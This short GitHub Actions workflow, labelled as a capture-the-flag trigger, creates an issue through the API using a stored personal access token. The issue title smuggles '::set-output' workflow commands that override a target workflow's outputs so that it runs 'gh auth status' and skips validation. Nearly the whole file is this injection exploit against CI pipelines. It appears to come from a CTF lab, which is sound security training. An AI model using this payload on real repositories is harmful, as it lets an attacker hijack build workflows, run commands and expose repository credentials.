name: Trigger CTF
on:
  workflow_dispatch:

jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - name: Create issue to trigger target workflow
        uses: actions/github-script@v6
        with:
          github-token: ${{ secrets.GH_PAT }}
          script: |
            const title = `Prepare me
::set-output name=command::gh auth status
::set-output name=skip::false
::set-output name=valid-command::true`;
            const body = 'Trigger from helper workflow';
            await github.rest.issues.create({
              owner: context.repo.owner,
              repo: context.repo.repo,
              title,
              body,
            });
